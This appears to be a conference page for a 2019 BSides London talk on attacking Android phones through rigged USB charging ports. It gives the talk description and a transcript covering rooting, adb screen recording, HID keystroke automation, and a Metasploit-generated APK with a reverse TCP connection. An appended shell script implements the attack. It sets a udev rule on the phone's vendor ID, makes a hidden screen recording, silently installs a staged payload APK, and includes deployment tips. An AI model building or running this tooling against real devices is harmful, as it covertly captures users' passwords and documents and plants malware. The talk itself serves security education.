
A Newbie's Talk On Mobile Dangers Through The Looking Glass

BSides London · 2019 · 15:06 · Published 2019-06
Speaker: Sarah Kingham

About this talk
Sarah Kingham demonstrates physical attack vectors against Android devices using a Raspberry Pi and USB accessories. The talk covers rooting Android devices programmatically, capturing sensitive data via screen recording when a device is plugged into a compromised USB charging port, automating the Android Debug Bridge (adb) to install malicious APKs, and working around the USB-debugging authorisation prompt with keyboard (HID) automation on a Digispark board. She also touches on related threats including the USB Killer and the Frida dynamic instrumentation framework, with brief mentions of iOS vulnerabilities.
Original YouTube description
A talk on the vulnerabilities and attacks that can be carried out using other devices such as a Raspberry Pi and USB-OTG accessories to infect rooted Android devices, such as inserting malicious files, including exploring the consequences of rooted devices. I am going to explore the possibility of rooting a device programmatically using a Raspberry Pi and documenting any issues encountered when doing this. One use case being the new types of charging ports. Not all charging points require plugs, but merely a USB port where you plug in your cable using the USB connector... what if this wasn't just a port to charge your phone, but had a Pi behind it? I would also like to look at the past vulnerabilities associated with other OSes like iOS.
Transcript [en]

Hi everyone, welcome to my talk, "A Newbie's Talk on Mobile Dangers Through the Looking Glass". It's a bit of a mouthful to say, I must admit. A little bit of background about how this talk came about: I went to a security conference a few months ago with a colleague and I bumped into Andy and David. We started talking about BSides and possibly doing a talk, and I said to them I wanted to do a talk after my dissertation, but after a few beers they did persuade me to do this talk now. So anyway, they helped me out with this. So, a quick run-through of what my talk's about: these are a few points that I've expanded on a little bit. It's been quite a steep learning curve, because I hadn't really done a talk before, so I've been working on it quite a lot, and it was a steep learning curve.

The first thing I wanted to look at was why people actually root their devices, and there are quite a lot of positives. Initially I thought it was a bad thing; I thought if you've rooted your device you're opening yourself up to a lot of vulnerabilities, but actually there are definite positives: you can increase your privacy, you can get rid of a lot of the bloatware on your device, and you can install cool themes and third-party apps if you want to do that. I mean, how many of you in the audience have an Android device? Cool. How many of you have rooted your Android device? So a lot of you probably knew what you were doing when you rooted your device, especially here, but some people don't necessarily know what they're doing: they could be installing custom themes and new ROMs, and you can do cool things with that, but you could also possibly break your device, which I did experience the first time when I was testing things. Also, some of the apps won't work, and if you install a third-party app it could be malware and you could open your device up to more.

So first I looked at how you actually root a device. There are two ways I found so far: there's the manual way, and then I saw that you can install apps to root your device. So when I went to root my device (the device I had was a Samsung, which was really rubbish; I didn't want to do it on my iPhone), I tried to install KingoRoot and One Click Root. One Click Root you had to pay for, and KingoRoot didn't actually work on my device, and I wanted to see how you'd be able to root a device manually anyway. So I gave it a try and installed the TWRP recovery image. When I went to root it, I went into fastboot mode and installed the recovery image, and then I ended up going through and installing the binary, so I used SuperSU, although Magisk is the newer version that people use. When it's in recovery mode you install that binary, and basically installing the superuser binary then enables you to grant root to applications, and you can do cool things like customise the firmware on your device or anything like that. I thought that was really interesting, actually. Before I did the talk I thought it could be a danger, obviously, and I've changed my mind a lot on that side: if you know what you're doing you can do some really cool things, you can improve the battery life of your device and things like that.

So first I set up my lab. It was really just a basic setup [inaudible]. I had a Pi Zero, which had terrible processing power, so I moved to a Pi 3 B+ and it worked a lot better. Just a quick setup: I mean, the Pi had one USB port, and I was plugging in my mouse, taking it out, plugging in my keyboard, taking it out, and then I plugged in my phone and it was like, I can't actually run any commands on my phone, because it didn't have enough ports. So I got a USB port splitter. The whole idea behind this talk was the fact that I've been seeing a lot of these USB charging ports around, in public places and on buses and whatnot, and I think this is a possible attack vector, because if you plug your device into this random USB port you don't necessarily know what's going to happen. So the whole idea behind this was programmatically rooting your device, and I did feel a lot like this when I started looking into it, because there are a lot of reasons why you can't, and security is actually quite high on these devices. So for example, when you plug your device in, there's the USB debugging pop-up that comes up on the screen; you have to physically root the device as well, press buttons and answer manual questions and whatnot. So yeah, human input is needed: you do have a pop-up, you have to press OK and whatnot, and that's an issue. So I decided to try and find ideas to work around that, but first I wanted to see what you could do

when you plug your device into a USB port when it's not rooted. So, a quick disclaimer here: this is if you plug your device into a USB charging port and a Pi was behind that port, then what could happen? I played around with udev rules to interrupt, and the kernel detects when a device is plugged in. I created a shell script to kick off screen recording, which is quite a cool thing: if you do adb shell, you can screenrecord your device. There were quite a few ifs and buts. With the code that I wrote here, you can see the vendor ID detects the device and kicks off the Pi script; you have to have a specific vendor ID for it to kick off in the background. It's very simple code, and there's a lot I want to develop on it from this, but basically it records the screen and you can capture it. The maximum is about three minutes, but you could possibly capture passwords, and you can see that showing up there, and you could also see emails or sensitive documents. I thought that was quite interesting, and I liked the idea that if you did plug your device in you don't know what's happening, because the user doesn't necessarily see it. You have to make sure that the device is unlocked and USB debugging is enabled first, though.

Well, one of the issues, because the USB debugging pop-up came up, was I was thinking, what's a good way to work around that? So I played around with a Digispark device, and I went through about five of them because all of them broke, but you can automate the keyboard on the board, pretend it's a human interface device and automate some of the steps. So here I've just got a GIF of the code working on the side, and you can see it's switching and pressing OK, and if this develops a little bit further you'd be able to kind of cancel out the pop-up. Because imagine if you plug the device into this USB port: this runs and it's just sending the codes, and you can automate a lot of this, and the Pi could be doing something more. You could also crack passwords, but they take a really long time; I didn't really try it, it's something I'd like to develop.

So initially I had a look at third-party apps as well, because that was one of the issues behind it, and there was one called a fake Snapchat app that I looked into. If you were someone like a grandma, for example, who had a phone and installed this app, this app could possibly, with the permissions, go back to the network and also steal the credentials, and it used to be in the Google Play Store. It's taken down now, but it's so easy, because this is the newbie's talk: you could just download the APK file and install it onto the phone, just like so. Being the newbie that I am, I decided to try and create an APK file using EasySploit, which basically uses msfconsole and [inaudible], and I had a look at trying to install that onto my device. So I used ADB, the Android Debug Bridge, to automate the install on the back of my Pi: you plug it in, and when I plugged it in I actually lost the APK file, I don't know how. I checked it and tried to understand it; when I uninstalled it and tried to install it again, it was saying it was already installed, so I don't know what happened there, but that was one of the things. I think if you manage to install it and kick it off, then it would run in the background and you'd be able to exploit it with a reverse TCP connection with the payload. So if you imagine you've plugged your device in and you can install the APK file, they might click on it through some social engineering, or possibly [inaudible], but these can kick off in the background if you run the adb shell command. If you automated that in a script, when it's plugged in and the udev rule kicked off, you'd be able to create this reverse TCP connection to the Pi, and then from that SSH in, so you could be like a hacker in a cafe or something, SSH into the Pi that's hidden and disguised, and then you'd be able to access all these files on this rooted device, for example, that has been plugged in, and they would really be none the wiser. Otherwise you'd have to make sure that you've unlocked the device again and got rid of all the pop-ups.

So because the install of the APK file didn't fully work out, I was like, well, what was this APK file actually doing in the background? So I used apktool just to pull out some of the files of the APK that had been generated with msfconsole, because I wanted to see how it was working, and basically it had all these permissions, and if someone installed this APK file, clicking yes and granting all these permissions, you basically had a bug on your phone. This is really interesting and something I really want to look into as well, so there are a lot of ideas. So you've got all these permissions, and I also played around with the smali files and this tool called dex2jar, so I had a look at that, and JD-GUI, and I opened up some of the smali files so I could read them in Java. That's definitely for the future.

A few quick mentions: I wanted to say there are a lot of cool things already out there in terms of just destroying a device, I guess. So you've got the USB Killer, which short-circuits itself into your phone and kills it completely. So imagine if you're a businessman or whatever and you plug your device into this USB port and it kills your phone; that's basically your life, as a lot of people have phones these days. And there's Frida as well; I'm pretty sure there was a talk

on that earlier. If you've rooted your device, for example, and you've installed Frida and you've used it to pretend that you're not rooted, then you can install a third-party malicious app and that will get all the access, break out of the sandbox environment and cause a bit of damage. So Frida could be a nice [inaudible]; it's quite interesting, but [inaudible] depending on time. Yeah, so I wanted to mention iOS, because I didn't play around with it; it's a bit of a grey area because it's closed source. I didn't look into the vulnerabilities of it; however, there's an exploit database for this you can find online. I'm pretty sure there's a link in my description; you can come and talk about it. But yeah, it's not just Android devices that are vulnerable. As part of future work I do want to look into this a bit further, and I'd love to do a 2.0 of this where I've actually researched into it a lot, because I didn't have too much time to research this one. So I'm interested in mobile malware and researching that, and I love the automation side behind it: the whole idea of this was automating the exploits when you plug your device into the Pi, so I'd like to work on that. Yeah, that's pretty much it. So if you have any questions, because it might not have been so clear, please ask away, because I could probably explain it better in a conversation.

[Audience question, partly inaudible.] The guy all the way in the back, yeah. Use the microphone. [The question concerns creating the Digispark device.]

I said it looks like such a small slide, but I spent days just trying to get this automation to work, plugging this keyboard into my phone and pressing the keys. I tried to make these steps actually work, because you can see it working as soon as you plug it in, and it's so satisfying when you actually manage to get that working. I'd love to develop it so you could create a BadUSB with these Digispark boards: just plug it in and imagine what you could do with your phone then. Yeah, that's probably one of the [inaudible]. Other questions?

[Audience:] Remember the old days when ADB was the assembler debugger? Geez. Sorry, comments, thoughts; it's not a question.

Is this hand [inaudible]? Do you have any [inaudible]? I'd love to hear your thoughts on this, because as you can see it's a lot of ideas and I've still got a long way to go with this, so please just comment or approach me, because I'm really open to learning more about it.

[Audience:] So the USB device you showed up there, the little thing, was that actually like a Rubber Ducky or something equivalent?

So I got these Digispark devices; they're like knock-off Arduinos. I bought a load of them, and a lot of them just didn't work, because I'm clearly not sure exactly [inaudible]. So I got the idea of a BadUSB; I had the idea about BadUSB, but I didn't want to try and create something with [inaudible] code initially, because I've got no experience with this. I wanted to pull files off the device and then move them onto a USB; it wasn't really close, I haven't managed to get that working, but I did just end up using it to send commands to the phone, and it literally works straight away.

Gabe, hiding in the back. [Audience:] I need another 10,000 steps today. Just walk down the plane when you fly home.

[Audience:] Talking about the requirement to have the device ID, did you do anything with it, attempting to automatically identify the device, to grab the device ID, maybe with a database or something? Is that something you've looked at as possible?

No, I didn't. It could definitely be possible. In my head I thought, if it was actually going to become a working thing, [inaudible]. When I was testing it, it's obviously my practice, having a load of udev rules, but initially I spent a lot of time looking at GVFS and where it was mounted and seeing if I could alter anything like that, so when it's plugged in, if it detects a device like that, I could definitely look to get that to work. I was thinking a lot about vendor IDs, but it's hard, because it's very specific to one device, whereas there are different types of devices out there and there are different ways of rooting the devices, and it's very varied. So yeah, that'd be something I'd want to look into.

[Audience question, mostly inaudible, about how udev and the kernel detect the device.]

Oh, so basically with the udev rules, it has... it's not really a listener; yes, it's a mere listener, and it talks to the kernel; the kernel does that, [inaudible], but yeah, it detects the device that way. So when I was testing it, I ran lsusb to find out what the vendor ID and the product ID were, and wrote it that way. Originally I was thinking you'd have to use the vendor ID and the product ID in the rules file so it would kick anything off, but actually you could limit it to the vendor ID. When I was testing it, you had to have it unlocked and also USB debugging enabled, and I managed to get it to kick off the shell script to bring up a browser, so I knew it was working.

[Audience, inaudible.] Yeah, [inaudible], I do have that; probably [inaudible] a little better. Excellent, thank you very much.
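The Pi-side automation the talk describes (a udev rule keyed on the phone's USB vendor ID, a handler that waits for an authorised adb device, starts a time-limited screen recording and installs a staged APK) together with the permission check on an apktool-decoded manifest, written up here as one added shell example. This is not the speaker's code: it assumes adb and apktool are on the Pi's PATH, that the phone is unlocked with USB debugging enabled and this host already authorised, uses Samsung's vendor ID 04e8 as a placeholder, and the script path `/usr/local/bin/charge-port.sh`, the APK staging path and the sample manifest are all hypothetical or constructed for the example.

```shell
#!/bin/sh
# Added example, not the speaker's code. A Pi-side "charging port" handler:
#   rule    -> print the udev rule that runs this script when a phone with
#              VENDOR_ID is attached (matching on idVendor only, as in the talk)
#   capture -> wait until adb reports an authorised device, start a screen
#              recording (screenrecord caps at 180 s) and install a staged APK
#   audit   -> list the uses-permission entries of an apktool-decoded manifest
#   demo    -> print the rule and audit the constructed sample manifest below
# Assumptions: adb and apktool on PATH, phone unlocked with USB debugging on
# and this host already authorised. 04e8 is Samsung's USB vendor ID, used as
# a placeholder; the script path and APK staging path are hypothetical.

VENDOR_ID="${VENDOR_ID:-04e8}"
ADB="${ADB:-adb}"                               # overridable, so a stub can be used offline
OUT_DIR="${OUT_DIR:-/tmp/captures}"
APK_PATH="${APK_PATH:-/opt/stage/payload.apk}"  # hypothetical staging location
TIME_LIMIT="${TIME_LIMIT:-180}"                 # screenrecord's hard maximum

udev_rule() {
    # ATTR{idVendor} is only present on the usb_device node, so each plug-in
    # fires once rather than once per interface.
    printf 'ACTION=="add", SUBSYSTEM=="usb", ENV{DEVTYPE}=="usb_device", ATTR{idVendor}=="%s", RUN+="/usr/local/bin/charge-port.sh capture"\n' "$VENDOR_ID"
}

# adb lists the phone as "unauthorized" until the on-screen prompt is accepted;
# only a line whose state column reads "device" is usable.
adb_ready() {
    "$ADB" devices | awk 'NR > 1 && $2 == "device" { ok = 1 } END { exit !ok }'
}

wait_for_device() {
    tries="${1:-10}"
    while [ "$tries" -gt 0 ]; do
        adb_ready && return 0
        tries=$((tries - 1))
        [ "$tries" -gt 0 ] && sleep 1
    done
    return 1
}

capture() {
    wait_for_device 10 || return 1
    mkdir -p "$OUT_DIR"
    stamp="$(date +%Y%m%d-%H%M%S)"
    # Background the recording; the udev RUN child itself is short-lived.
    "$ADB" shell screenrecord --time-limit "$TIME_LIMIT" "/sdcard/$stamp.mp4" \
        >"$OUT_DIR/$stamp.log" 2>&1 &
    if [ -f "$APK_PATH" ]; then
        "$ADB" install -r "$APK_PATH" >>"$OUT_DIR/$stamp.log" 2>&1 || true
    fi
    echo "$stamp"
}

# Permissions requested by an AndroidManifest.xml produced by `apktool d`.
audit_permissions() {
    sed -n 's/.*<uses-permission[^>]*android:name="\([^"]*\)".*/\1/p' "$1"
}

# Constructed sample manifest (not the APK from the talk), for offline runs.
sample_manifest() {
    cat <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.payload">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <application android:label="payload"/>
</manifest>
EOF
}

case "${1:-}" in
    rule)    udev_rule ;;
    capture) capture ;;
    audit)   audit_permissions "$2" ;;
    demo)    udev_rule; tmp="$(mktemp)"; sample_manifest >"$tmp"; audit_permissions "$tmp"; rm -f "$tmp" ;;
    *) ;;
esac
```

Run `sh charge-port.sh demo` to print the rule and the permission list for the sample manifest. Two caveats match what the talk runs into: udev terminates long-running RUN children shortly after the event, so a deployed handler should hand the recording off to a detached service (for example via systemd-run) rather than rely on the trailing `&`; and nothing here works until the phone is unlocked, USB debugging is on and the authorisation prompt has been accepted (`adb devices` shows `unauthorized` until then), which is exactly what the Digispark keystroke automation in the talk is trying to get past, and what leaving USB debugging off or using a charge-only cable defeats.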